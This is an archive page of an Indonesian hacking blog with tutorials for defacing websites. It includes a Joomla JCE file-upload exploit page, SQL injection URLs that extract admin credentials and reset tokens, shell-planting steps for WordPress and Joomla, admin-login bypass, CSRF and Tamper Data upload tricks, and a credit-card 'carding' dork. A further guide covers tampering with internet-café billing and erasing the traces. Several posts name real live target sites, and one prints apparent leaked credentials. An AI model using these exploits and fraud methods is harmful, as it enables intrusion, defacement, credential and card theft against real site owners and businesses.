Tampilkan postingan dengan label Tutorial. Tampilkan semua postingan
Tampilkan postingan dengan label Tutorial. Tampilkan semua postingan
0

Exploit JCE Joomla Extension | Exploit Joomla JCE

Kamis, 09 Mei 2013
Arsyad-Cyber
Asslamualaikum,  Maaf Sebelumnya saya jarang mempost, karna berhubung banyak nya tugas sekolah an yang harus saya selesaikan
Gk usah lama" , langsung Check This Out !!!!
Copas Dulu File JCEnya :
<html>
<head>
<title>JCE Joomla Extension Remote File Upload</title>
<link href="http://fonts.googleapis.com/css?family=Orbitron:700" rel="stylesheet" type="text/css">
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.7.2/jquery.min.js" type="text/javascript"></script>
<style type"text/css">
body {
 background:#e1e1e1;
 font-family: orbitron;
 padding:4;
 width:98%;
 background-color: #e1e1e1;
 border: 1px solid #050505;
 -webkit-border-radius: 6px 6px 6px 6px;
  -moz-border-radius: 6px 6px 6px 6px;
   border-radius: 6px 6px 6px 6px;
 *zoom: 1;
 -webkit-box-shadow: inset 0 1px 0 #ffffff;
  -moz-box-shadow: inset 0 1px 0 #ffffff;
   box-shadow: inset 0 1px 0 #ffffff;
}
#header {
 color:#00FF00;
 text-align:center;
 text-shadow:1px 2px 3px #0000FF;
 font-size:30px;
}
.tablenya{
}
.atas1 {
 width:30%;
 font-size:18px;
 font-weight:bold;
 background-color: #e1e1e1;
 border: 1px solid #050505;
 -webkit-border-radius: 6px 0 0 0;
  -moz-border-radius: 6px 0 0 0;
   border-radius: 6px 0 0 0;
 *zoom: 1;
 -webkit-box-shadow: inset 0 1px 0 #ffffff;
  -moz-box-shadow: inset 0 1px 0 #ffffff;
   box-shadow: inset 0 1px 0 #ffffff;
}
.atas2 {
 width:50%;
 font-size:18px;
 font-weight:bold;
 background-color: #e1e1e1;
 border: 1px solid #050505;
 -webkit-border-radius: 0 6px 0 0;
  -moz-border-radius: 0 6px 0 0;
   border-radius: 0 6px 0 0;
 *zoom: 1;
 -webkit-box-shadow: inset 0 1px 0 #ffffff;
  -moz-box-shadow: inset 0 1px 0 #ffffff;
   box-shadow: inset 0 1px 0 #ffffff;
 color:#FF0000;
}
.tengah1 {
 width:30%;
 font-size:18px;
 font-weight:bold;
 background-color: #e1e1e1;
 border: 1px solid #050505;
 -webkit-border-radius: 0 0 0 0;
  -moz-border-radius: 0 0 0 0;
   border-radius: 0 0 0 0;
 *zoom: 1;
 -webkit-box-shadow: inset 0 1px 0 #ffffff;
  -moz-box-shadow: inset 0 1px 0 #ffffff;
   box-shadow: inset 0 1px 0 #ffffff;
}
.tengah2 {
 width:50%;
 font-size:18px;
 font-weight:bold;
 background-color: #e1e1e1;
 border: 1px solid #050505;
 -webkit-border-radius: 0 0 0 0;
  -moz-border-radius: 0 0 0 0;
   border-radius: 0 0 0 0;
 *zoom: 1;
 -webkit-box-shadow: inset 0 1px 0 #ffffff;
  -moz-box-shadow: inset 0 1px 0 #ffffff;
   box-shadow: inset 0 1px 0 #ffffff;
 color:#FF0000;
}
.required {
 text-align:right;
 color:#FF0000;
 position:fixed;
 right:3%;
}
input {
 font-size:18px;
 font-weight:bold;
 background-color: #e1e1e1;
 border: 1px solid #050505;
 -webkit-border-radius: 6px 6px 6px 6px;
  -moz-border-radius: 6px 6px 6px 6px;
   border-radius: 6px 6px 6px 6px;
 *zoom: 1;
 -webkit-box-shadow: inset 0 1px 0 #ffffff;
  -moz-box-shadow: inset 0 1px 0 #ffffff;
   box-shadow: inset 0 1px 0 #ffffff;
 color:#FF0000;
}
.start {
 text-align:center;
 color:#FF0000;
}
#footer {
 background-color: #e1e1e1;
 border: 1px solid #050505;
 -webkit-border-radius: 0 0 6px 6px;
  -moz-border-radius: 0 0 6px 6px;
   border-radius: 0 0 6px 6px;
 *zoom: 1;
 -webkit-box-shadow: inset 0 1px 0 #ffffff;
  -moz-box-shadow: inset 0 1px 0 #ffffff;
   box-shadow: inset 0 1px 0 #ffffff;
}
/*NoScript*/
#enjs {z-index: 999;position:fixed;top:0;left:0;width:100%;height:100%;background-color:#000;margin:0;padding:0;}
#enjs p {margin:0;padding:0;width:100%;color:#333;position:relative;top:40%;font:bold 18px/20px arial;text-align:center;text-shadow:none;}
/*ScrollBar */
::-webkit-scrollbar {width: 12px;}
::-webkit-scrollbar-track {background:rgb(71, 71, 71);}
::-webkit-scrollbar-thumb, ::-webkit-scrollbar-thumb:window-inactive { background: rgb(34, 34, 34); }

#loading-overlay {position:fixed;top:0;left:0;right:0;bottom:0;background:#000000;z-index:999999;text-align:center;width:100%;height:100%;padding-top:22%;color:#FF0000;}
.ball {background-color: transparent;border:5px solid rgb(240 ,0 , 0);border-right:5px solid transparent;border-left:5px solid transparent;border-radius:50px;box-shadow: 0 0 35px rgb(255 ,0 , 0);width:50px;height:50px;margin:0 auto;-moz-animation:spinPulse 1s infinite ease-in-out;-webkit-animation:spinPulse 1s infinite linear;}
.ball1 {background-color: transparent;border:5px solid rgb(240 ,0 , 0);border-left:5px solid transparent;border-right:5px solid transparent;border-radius:50px;box-shadow: 0 0 15px rgb(255 ,0 , 0);width:30px;height:30px;margin:0 auto;position:relative;top:-50px;-moz-animation:spinoffPulse 1s infinite linear;-webkit-animation:spinoffPulse 1s infinite linear;}
@-moz-keyframes spinPulse {0% { -moz-transform:rotate(160deg); opacity:0; box-shadow:0 0 1px rgb(255, 0, 0)}50% { -moz-transform:rotate(145deg); opacity:1; }100% { -moz-transform:rotate(-320deg); opacity:0; }}
@-moz-keyframes spinoffPulse {0% { -moz-transform:rotate(0deg); } 100% { -moz-transform:rotate(360deg); }}
@-webkit-keyframes spinPulse {0% { -webkit-transform:rotate(160deg); opacity:0; box-shadow:0 0 1px rgb(255, 0, 0)} 50% { -webkit-transform:rotate(145deg); opacity:1;} 100% { -webkit-transform:rotate(-320deg); opacity:0; }}
@-webkit-keyframes spinoffPulse {0% { -webkit-transform:rotate(0deg); } 100% { -webkit-transform:rotate(360deg); }}
</style>
</head>
<body>
<div id="header">-=[ JCE Joomla Extension Remote File Upload ]=-</div><br>
<form name="form1" action="" enctype="multipart/form-data"  method="post">
<table class="tabelnya">
 <tr>
  <td class="atas1">hostname (ex:www.sitename.com):</td>
  <td class="atas2"><input name="host" size="90"> *</td>
 </tr>
 <tr>
          <td class="tengah1">path (ex: /joomla/ or just / ):</td>
    <td class="tengah2"><input name="path" size="90"> *</td>
 </tr>
 <tr>
          <td class="tengah1">Please specify a file to upload:</td>
    <td class="tengah2"><input type="file" name="datafile" size="88"> *</td>
 </tr>
 <tr>
          <td class="tengah1">specify a port (default is 80):</td>
    <td class="tengah2"><input name="port" size="90"></td>
 </tr>
 <tr>
          <td class="tengah1">Proxy (ip:port):</td>
    <td class="tengah2"><input name="proxy" size="90"></td>
 </tr>
</table>
<div id="footer">
          <div class="required">*fields are required</div>
    <br>
    <div class="start"><input type="submit" value="Start" name="Submit"></div>
    <br>
</div>
        </form>
  <div class="start">&copy 2013 ShadoWNamE</div>
<div id="loading-overlay">
<div class="ball"></div>
<div class="ball1"></div>
<h3>Loading..............</h3>
</div>
<script>
// hilangkan overlay dengan efek .fadeOut() jika keseluruhan halaman telah selesai dimuat
$(window).bind("load", function() {
    $("#loading-overlay").fadeOut();
});
</script>
</body></html> 

Dork : 
 inurl:index.php?option=com_jce
Oke, Langsung Aja Tutornya nya ^_^

1. Upload File Php nya Di Shell Agan / Localhost



2.  Masukan Dork Ke Google

3. Keluar tuh Banyak Website, Coba 1-1 yah :D , Tapi Saya Disini Sudah Punya Live Target
www.saintpatricktemuco.cl
 4. Masukan Url Site nya Ke  " hostname (ex:www.sitename.com): " ,
    Contoh : www.saintpatricktemuco.cl ( tanpa http:// dan / )
5. Di Path : path (ex: /joomla/ or just / ):
Contoh : www.site.com/joomla/ ( Untuk Path bisa gunakan /joomla/ atau kalau di website tidak mempunyai path bisa gunakan / saja )

6. Pilih Shell Yang Akan Kalian Upload 

7.Klik START !!!

8. Buka deh tuh shell nya

9. Cari file " index.html " ( tanpa tanda kutip ) , Klik E / Edit

10 Pasang Script Agan , Klik Save

11. Lalu Buka Link nya http://www.saintpatricktemuco.cl/images/stories/index.html


Sekian Tutor dari saya, maaf-maaf bila ada salah kata ... Jika kita terus berusaha, semua akan pasti bisa ^_^
Terima kasih , Wassalamualikum Wr. Wb.

Hargai karya orang lain dengan memasang sumber setelah mengcopy  
0

Setting Robot.txt Untuk Blogger

Rabu, 08 Mei 2013
Selamat siang sobat cyber :)

Kali ini saya mau sare nih sedikit tips menyeting robot.txt pada blogger, emang fungsi Robot.txt apa sih ? Robot.txt berfungsi untuk mempermudah blog kita agar ke index sama mesin pencarian :)

Oke langsung saja kita ke tutorialnya :D

1. Login ke akun blogger kalian
2. Masuk ke Setting ~> Search Preference

  • sebelumnya atur deskripsi blog anda dahulu
3. klik Robot.txt lalu ubah ke "yes" kemudian pastekan code berikut ini :
User-agent: Googlebot
Disallow: /?m=1
Disallow: /?m=0
Disallow: /*?m=1
Disallow: /*?m=0
User-agent: *
Disallow: /search?*
User-agent: Mediapartners-Google
Allow:/
Sitemap: http://bimo-cyber.blogspot.com/feeds/posts/default?orderby=updated

  • Ganti huruf berwarna merah dengan alamat blog kalian 
4. Setelah itu sekarang setting "Custom Robots Tag Header" , ikuti gambar berikut :


5. Klik Save Change
6. Selesai

Sekian tutorial cara Menyetting Ronots.txt pada Blogger

Sumber: Bimo-Cyber
1

Exploit Joomla 0day ( COM_EXPOSE )

Kamis, 11 April 2013
Arsyad-Cyber
 
 
#Author: Mauritania Attacker
#Dork: index.php?option=com_expose
#Exploit: administrator/components/com_expose/uploadimg.php 
#Shell: /components/com_expose/expose/img/shell.php 
#Date: 11/05/2012
# www.mauritania-sec.com
 
 Hargai karya orang lain dengan memasang sumber setelah mengcopy   
1

Deface Site SCH.ID

Arsyad-Cyber
Dork : inurl:/html/index.php +site:sch.id

Exploit : /member/index.php or /member/user.php

User : siswanto
Pass : 123456

Tahap Menanam Shell

SIM -> Data Laporan -> Tambah data laporan -> simpan -> sukses

Tempat shell berada :

site.sch.id/laporan/namashell.php

Thank's : Tintonz-x207 - 207 Cyber Security - Java Defacer Team

Sumber : Tintonz 
3

Tutorial Carding Bagi Pemula

Sabtu, 06 April 2013
Arsyad-Cyber
Asslamualikum kawan ^_^ Maaf beberapa hari kemaren gk posting :D
Banyak tugas soalnya , jadi gk sempet posting ..
Yaudh , kali ini saya ingin menshare Tutorial Carding Bagi Pemula :D

Kita sekarang mencari nya menggunakan dork
Nih Dork nya

intext:exp: | expirate: creaditcard number: cvv: ext:txt 2015
ScreenShoot nya


Simber : Bandung4rt

Hargai karya orang lain dengan memasang sumber setelah mengcopy  
1

Deface CSRF ( Cross Site Request Forgery )

Rabu, 03 April 2013
Arsyad-Cyber

Pada kesempatan kali ini aku mau kasih tutorial deface dengan tekhnik CSRF, oke tanpa basa basi kita mulai yah :D

Bahan-Bahan:

1. Download Script CSRF
===============================================================
DOWNLOAD DISINI  Password: idca
===============================================================
Note: Aktifkan Java Script untuk download!!

2. Download MadspotShell Disini Extract dulu dari file Rar!

3. Cari target dengan DORK :
  • inurl:/wp-content/themes/shepard
  • inurl:/wp-content/themes/money
  • inurl:/wp-content/themes/clockstone
  • inurl:/wp-content/themes/ambleside
  • inurl:/wp-content/themes/pacifico
#Dork dikembangkan sendiri ya :)

4. Untuk coba2 gunakan Live Target & Live Target 2

5. Titip Nama :: Indonesian Cyber Army ( IDCA ) | Stealth Defacer Hacking Team (SDHT)

#Persiapan sudah selesai, sekarang tinggal kita eksekusi :)


Note: "Tidak semua website bisa dengan teknik ini, harap selalu mencari dan mencoba! karena dalam dunia Hacking tidak ada yg instants dan bisa berhasil dengan mudah! Mereka yg berhasil adalah mereka yg selalu sabar berusaha dan terus mencoba!"

Langkah- Langkah:

1. Masukan Dork ke dalam google (kurang jelas lihat gambar)


2. Pilih salah satu target yang kita dapat tadi (Kurang jelas lihat gambar)


Contoh :
http://www.robertcarpentry.com/wp-content/themes/pacifico/images/ ganti menjadi http://www.robertcarpentry.com/wp-content/themes/pacifico/theme

3. Klik folder "Function" lalu klik file "Upload-bg.php" / "uploadbg.php" / "upload.php"

Note: Jika muncul "You Must Login....."atau blank? cari target lain!! :p  "Jika muncul "error" berarti Web target Vulnerable" ;p

4. Buka file CSRF.html yang tadi sudah di download dengan notepad, ganti URLTARGET  dengan link yang berada di addres bar target kamu tadi. Lihat Gambar! lalu save!
Contoh: "http://www.robertcarpentry.com/wp-content/themes/pacifico/theme/functions/upload-bg.php"



5. Buka file CSRF.html, akan muncul upload file. lalu Pilih Madspotshell.php lalu klik upload .


Jika berhasil maka akan muncul seperti ini (lihat gambar)


6. Udah diganti ? dan jika berhasil maka tampilannya akan jadi seperti ini



#itu tandanya shell backdoor kamu sudah terpasang :D sekarang terserah mau kamu apain website itu :)

#Saya menggunakan SHELL dari teman saya om X Inject :D (tampilan shell akan berbeda beda loh setiap jenisnya)

Tampilan madspotshell::

7. Untuk eksekusi Index

Sumber : IDCA

Terima Kasih buat sobat gw dari IDCA Bimo dan ONix Aqua , saya hanya ikut men sharre tutorial yang diberikan dari Grop IDCA ^_^

Hargai karya orang lain dengan memasang sumber setelah mengcopy  
0

Deface Dengan Bypass Admin

Arsyad-Cyber
kali ini ane mau share tentang teknik Bypass Halaman Login Administrator! Bagaimana caranya? Yuk simak aja rame rame,, hehhehe ;)

Bahan Bahan :

Dork: inurl:/index_info.php     Lihat Dork yg lain Disini

Live Target : http://niche-marketplace.net/index_info.php  

Note: "Mohon Live Target Jangan Dirusak, karena untuk pembelajaran bersama, kalo udah bisa cari aja target yang lain!"

Langkah Langkahnya:

Cari Target Google.com dengan menggunakan Dork, disini ane dapet target http://niche-marketplace.net/index_info.php


Lalu masuk ke halaman login admin! biasanya letaknya site.com/admin/index.php atau bisa jadi site.com/[path]/admin/index.php kalo target ane : http://niche-marketplace.net/admin/index.php 


Setelah itu kita lakukan Inspect Elemen! dengan cara klik kanan, lalu pilih Inspect Element!



 Lalu akan muncul seperti gambar dibawah! yang perlu kita lakukan adalah mencari Source code berikut :


 Ganti "hidden" dengan "text" lalu akan muncul kotak label "admin_settings_read" ganti read menjadi write! lihat gambar!


Lalu tekan Enter!


Klik Login aja!

Note: "Kalo ada muncul pesan seperti digambar, berarti target vuln ato bisa di depes! Selain itu ga bisa, cari target lain! :p



Duaaarrrrrrrrr!! Udah masuk? Mantap! Trus mo ngapain lagi?? udah gitu aja! wkwkwkwk :p


Trus Tebas index nya gimana gan?? Hajiahhh,, :3 makanya baca tutorial ampe abis dulu, dipahami dan dipelajari baru dipraktekin.. hadeewwhhh!!

Oke, sekarang kita udah masuk ke halaman admin, saatnya kita tanem Shell! Apa itu Shell?? Baca lagi sono di postingan ane Apa itu WebShell :p Disini ane make Madspotshell!

WAJIB!!! Harap diperhatikan dan dicermati baik baik, jika ada sedikit kesalahan maka Shell sobat yg ditanem akan Gagal dieksekusi! dan akhirnya balik maning ke awal :p

Pertama gulirkan kebawah! cari menu "Add/Remove Navigation Page"



Klik Add/Remove Navigation Page! Lalu ketik nama shell.php sobat, kalo ane mah "idca.php". Untuk lebih jelasnya liat gambar!


 Lalu klik "Add New Navigation"


Setelah itu masih dihalaman yg sama, liat kebawah sampai menemukan kalimat: "Sort Page Buttons/links" trus ubah "idca.php.html" jadi "/idca.php". liat gambar!



Lalu klik "Sort Navigation Pages"!

Selanjutnya cari Menu "Edit Navigation Pages" lalu klik menu tersebut. Kemudian pada kolom "Please Select a Pages To Edit" lalu pilih "idca.php.html". disini kita akan melakukan Inspect Element lagi, lalu cari kata "idca.php.html" dan ubah jadi "idca.php".  Lihat gambar!


Kemudian masih dihalaman yg sama, gulirkan kebawah!

Pada kolom "Enter A Page Title As You Would Like To Be Seen" ketik "idca.php"

Pada kolom "URL For This Site" ketik "main_pages/idca.php"

Pada kota box, ceklis/centang ketiganya. untuk lebih jelas, lihat gambar!



Selanjutnya masih juga di halaman yg sama, gulirkan kebawah! Pada kolom "Enter Content for Your Pages" pilih "Source" lalu editor akan aktif!

Buka shell Backdoor (madspotshell.php) dengan notepad untuk dipaste kan ke Konten Pages!



WAJIB DIPERHATIKAN, karena menentukan keberhasilan!

Sebaiknya Shell Backdoor jangan diberi password!


Jadi nanti seperti ini cara nulisnya.

< Line kosong>
< Line kosong>
{ Isi Kodingan PHP Shell dari awal sampai akhir }
< Line kosong>
< Line kosong>

Yap di Line awal diisikan ruang kosong 2x (alias teken enter 3x) dan di Line akhir diisikan ruang kosong 2x (alias teken enter 3x). Kurang jelas? lihat gambar :


 lalu


Lalu klik Save! akan muncul pesan seperti gambar berikut!


Selanjutnya saatnya kita buka shell backdoor yg udah kita tanem! caranya tulis diadress bar: http://site.com/main_pages/Nama File Backdoor.php Liat gambar!



Huft! Akhirnya Selesai dan Berhasil tuh! Tinggal tebas index aja! wkwkwk

Sumber : IDCA

Hargai karya orang lain dengan memasang sumber setelah mengcopy
0

Tutorial Tamper Data

Arsyad-Cyber

Untuk mengupload PHP Shell ini kita biasanya mencari fasilitas upload file.php , nah kalo ntar pas agan mau upload extensi .jpg bagaimana ? yah, harus memakai Teknik Tamper Data ... Yaitu memanfaatkan celah upload image, sedangkan kita menipu admin dengan mengupload file yg extensi nya .php ^_^

Dork : inurl:"/?ptype=post_listing"
inurl:"/?ptype=post_event"
inurl:"/?page=property_submit"
intext:"Geo Places Theme by"

NB : Anda bias menambahkan site: ^_^



1. Siapakan dulu file shell.php seperti : Shell B374K M1N1


2.  Pilih salah satu shell
3. Rename  extensinya menjadi : shell.php.jpg
4. Install add ons Tamper Data dulu di browser mozilla kita :D
5. Restart dan kita mulai upload 
6. Cari fasilitas uploads gambar pada website target, kemudian tamper data kita jalankan

8. Trus Uploads shell.php.jpg kita dan tamper :D


 9. Setelah langsung jalankan tamper datanya, tunggu pop out dari tamper data muncul , cari file shell.php.jpg dan hapus bagian .jpg , akan menjadi shell.php .. abis gitu kita klik OK



Letak Shellnya :

http://site.com/wp-content/themes/ ? /images/tmp/[shellmu] -
http://site.com/path/wp-content/themes/GeoPlaces/images/tmp/[shellmu]
Hargai karya orang lain dengan memasang sumber setelah mengcopy  
0

Hack Billing Warnet Tanpa Software

Selasa, 02 April 2013
Arsyad-Cyber
Hacking Billing Warnet Untuk Operator



1. Pertama-tama, close kan billing explorernya. trus dimintai password. isikan password defaultnya 008
2. Kemudian masuk ke tempat dimana folder billing explorer disimpan. Biasanya sih ada di
D:\Billing Explorer\Explorer Billing\Billing Warnet Explorer
3. Kemudian cari file bill01.008
4. kemudian copy kan file bill01.008 tadi ke My Document aja ya. atau terserah dimana anda mau. INGAT. File bisa di copy kalau billing explorernya sudah kita CLOSE. jadi, lakukan dulu langkah 1. oke?
5. Setelah itu buka lagi aplikasi billing explorernya. Selesai untuk tahap pertama

Kalau ada user yg selesai main, otomatis bertambah lagi kan "REPORT DATABASE B-EXP" nya biarkan saja gan. Misal, user selesai main dan kena Rp.5000
Lanjut, kita CLOSE kan lagi billing explorenya.Lakukan langkah2 diatas yaa

Kalau langkah no.1 udah di selesaikan, sekarang kita masuk ke langkah:
a. Copy file bill01.008 yang ada di My Document tadi. kemudian paste kan ke
D:\Billing Explorer\Explorer Billing\Billing Warnet Explorer
Eits, disitu udah ada namanya, jadi kita rename dulu. trus yg kita copy tadi paste kan ke yang barusan w sebutin
b. kemudian buka lagi aplikasi billing explorernya. Coba lihat, yg Rp.5000 barusan selesai tadi ada gak? ternyata gak ada gan. jadi beres deh kita akali databasenya

Untuk menghilangkan jejak, kita hapus file yang barusan kita rename tadi, trus hapus deh yg di Recycle Bin

Mungkin cara ini bisa digunakan di Billing Billing lain yg menggunakan database. tapi coba aja dulu ya, soalnya ane cuma berhadapan di Billing Explorer

Oh iya, ane emang gunain ini tanpa software karena di warnet w EXE di Block. jadi kagak bisa install software atau apa lah. Dan maaf kagak bisa disertai Screen Shot / gambar / tutorial dalam bentuk video.
Fvck to Teknisi =))


Source: Doza Cracker - Trial error and then do it
www.id-fb.com
Dedicate for: MBT - Cyber X-Plorer - Cyber4rt - Deface Zone
Hargai karya orang lain dengan memasang sumber setelah mengcopy  
 
0

Cara Upload Shell Di CMS Joomla

Arsyad-Cyber

oke teman teman disini saya akan sedikit membahas tentang cara upload shell di joomla


1 halaman admin joomla
[Image: 95145200.jpg]


2. klik installer - template site
[Image: 55797530.jpg]


3. klik browse ... terus tinggal dimasukkan template yang akan di install
[Image: 37135582.jpg]


4.setelah proses install template baru selesai kemudian klik continue
[Image: 72296433.jpg]


5. centang di tempalte baru kita install terus klik edit HTML
[Image: 44600726.jpg]


6. ini gambar scrift default template yang baru diinstall
[Image: 83346777.jpg]


7. setelah terbuka baru kita ganti scrift templatenya dengan scrift shell 
[Image: 41836185.jpg]


8. nah terakhir baru kita lihat linknya dimana shell itu berada
/webdesign/templates/siteground89/index.php
[Image: 16079271.jpg]


9. baru deh kita buka shellnya 
http://www.site.com/webdesign/templates/.../index.php
[Image: 46857503.jpg]


mengapa upload shell di joomla mesti install tempalte baru....tidak menimpah tempalte lama. karena kalau template baru masih bisa Writeable
jadi masih bisa diganti scriftnya.... tapi tergantung juga sih... ada juga template yang udah lama pun kadang2 bisa Writeable
 Sumber : Andi-Tencho
Hargai karya orang lain dengan memasang sumber setelah mengcopy  
 
0

Cara Tanam Shell/Backdoor di CMS Wordpress

Arsyad-Cyber -
sekedar melanjutkan tutor kemarin , mungkin ada yg blm tau cara pasang backdoor pada wordpress...
oke langsung aja ya :)
saya anggap agan udah punya ussername & password target...silahkan login terlebih dahulu ,,
setelah login baru ikuti langkah di bawah....

1.klik editor pada tab appearance ( lihat gambar )


























2. klik 404.php

3 . lalu hapus semua scriptnya dan ganti dengan script shell/backdoor php yg agan punya...
4. klik Update File
5.lihat gambar di bawah " /wp-content/themes/zeepersonal/404.php " pathnya disitu...


























6. kita buka http://harrisondewitt.net/wp-content/themes/zeepersonal/404.php
dan berhasil :D


























biar g curiga, upload lagi backdoornya, dan kembalikan script 404.php nya seperti semula :)
Author : Disini
Hargai karya orang lain dengan memasang sumber setelah mengcopy  
0

Exploit WpStore

Arsyad-Cyber -
- = Newbie Was Here = -
Yang mastah silahkan lewat :D klo mau baca blh
Newbie merapat :D




dork : inurl:/wp-content/themes/
WPstore/
kita dapat meng-upload backdoor
dengan vulnerability ini:
1. WPStore
2. eShop
3. KidzStore
4. Emporium
5. Store
klo udah dpet target, kita tambah /
UPLOAD di target tersebut...
http://www.target.com/wp-
content/themes/Wpstore/upload
selanjutnya akan muncul file
upload,sekarang kita upload shell
kesayangan.... klo udah di upload,
tinggal eksekusi shell kita...
caranya :
http://www.target.com/wp-
content/uploads/products_img/
namashell.php
selesai dehhh..... sekrang terserah
mau di apain tuh sitenya... :D
Author : Arsyad Imam B.
Hargai karya orang lain dengan memasang sumber setelah mengcopy  
0

Exploit Joomla

Arsyad-Cyber - Targetnya cari di googlePake Dork ini:

inurl:"option com_artforms"

kita dapat target yaitu :

http://www.avaclean.com/

di exploitnya kodenya di paste ke target tadi ya :D

/index.php?option=com_artforms&task=vferforms&id=1+UNION+SELECT+1,2,3,version(),5,concat_ws(email,0x3a,username,0x3a,password)+from+jos_users--


ntar jadi nya kyak gini

http://sitetarget.com//index.php?option=com_artforms&task=vferforms&id=1+UNION+SELECT+1,2,3,version(),5,concat_ws(email,0x3a,username,0x3a,password)+from+jos_users--

disitu udah kelihatan emailnya

josh@bkmediagroup.comadminjosh@bkmediagroup.com:josh@bkmediagroup.com4fffa8274459e218833756e3149ab20d:jWtEsQNqFQPZchh86wvmnO3XIlTOwZ9P

nah open tab lagi ya kk mastah :)

teruscopy code reset pass ini

/index.php?option=com_user&view=reset

terus masukin kode reset paswordnya  menjadi seperti ini :

http://www.avaclean.com//index.php?option=com_user&view=reset

setelah itu disuruh masukin email nantinya

masukin email yg kita dapat tadiyaitu

josh@bkmediagroup.com

setelah di enteranda disuruh masukin code :

kita tinggalin dulu yg inikita cari kode tsb diweb yg kita exploid tadi

open tab lagi neh untuk ngambil token nya :)

masukan code ini :

/index.php?option=com_artforms&task=vferforms&id=1+UNION+SELECT+1,2,3,version(),5,concat_ws(username,0x3a,activation)+from+jos_users

ntar jadi nya gini

http://sitetarget.com//index.php?option=com_artforms&task=vferforms&id=1+UNION+SELECT+1,2,3,version(),5,concat_ws(username,0x3a,activation)+from+jos_users

code nya :

admineda7d6142fac40a533b56407a4617371

nah kita kembali ke halaman reset tadi

kita masukin aja token yang ini

eda7d6142fac40a533b56407a4617371

truss enter :)) eehhh minta password baru dech dia :D

uppzzzzz kita masukin aja dech password kita :))

setelah udah masukin

kita masuk ke halaman admin nya

contoh :

http://sitetarget.com/administrator

nah masukin user nya :) & password kita Selamat mencoba :)

Hargai karya orang lain dengan memasang sumber setelah mengcopy  
0

Exploit Joomla Com_Fabrik

   Oh ya, disini saya jelaskan sedikit ya tentang exploit. Saya sih belum tau arti lengkapnya, tapi secara singkatnya itu exploit dapat diartikan sebagai sebuah kode yang menyerang keamanan

Sekarang kita praktek, tapi ada syaratnya :p . Anda harus berusaha untuk mencapainya, jangan langsung nanya sebelum baca. Oke ! Lansung ke TKP.

1. Copas dork ini ke google [dork bisa dikembangkan]


  • inurl:index.php?option=com_fabrik

2. Ceritanya kita sudah mendapat si target

  • http://ar.librodar.com.ar/index.php?option=com_fabrik

3. Maka pastekan Vulnerable path nya di depan Url, Vulnerable path nya adalah ini :

  • index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1

4. Maka akan jadi seperti ini

  • http://ar.librodar.com.ar/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1

5. Langsung saja upload file, gak perlu dicentang kok ;) . Oh ya filenya bisa bertipe

  • php,asp,html,jpg

6. Sudah ? nah sekarang kita akses shellnya di

  • http://localhost.com/media/shell.php

Kalo tipe .php gabisa ya terpaksa dengan tamper data :D 

Live Target : http://ar.librodar.com.ar/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1

Sekian tutorial nya semoga bermanfaat kalau ada salah salah kata mohon dimaafkan
Sumber : Disini
Hargai karya orang lain dengan memasang sumber setelah mengcopy  
0

Deface Dengan RootKit

pertama-tama download dulu programnya di sini
Enaknya Program ini tidak perlu di install hanya tinggal di jalankan saja..

Nah disini saya akan mencoba deface situs http://redevprops.com/index.html yang tampilan


Okeh langsung kita jalankan saja programnya :


1. klik file "Is-rootkit.exe"..






2. klik "WebDav" ==> "asp shell maker"..



3. klik “Setting”.
*Lalu hapus “name of your shell”, ganti shell dengan sesuka anda..
Kalo tidak ganti dengan index.html saja..

*Hapus juga semua “write your shell here”, lalu masukan file yg berformat “.html” anda dengan mengklik “Load file”..

NB : Jika Tidak Punya Script Deface Bisa Menggunakan Script Saya Tinggal Anda Eddit" Aja DI Notepad :DD!!
Download Aja ==> DISINI <==

4. langkah selanjutnya adalah klik “Add site” lalu masukan alamat situs target..



5. dan yang terakhir tinggal klik “serang !!!” deh..
Tunggu beberapa saat, jika web tersebut vulnaribel maka akan keluar sperti ini..




Lalu copy shell yang sudah ter buat tadi..



Lalu kita lihat hasilnya, pastekan shell yang tadi kita copy di tempat kita masukan alamat..
Maka hasilnya sperti ini :


Halaman asli dari situs tersebut telah kita deface..hehehe
Sumber : Disini 
Hargai karya orang lain dengan memasang sumber setelah mengcopy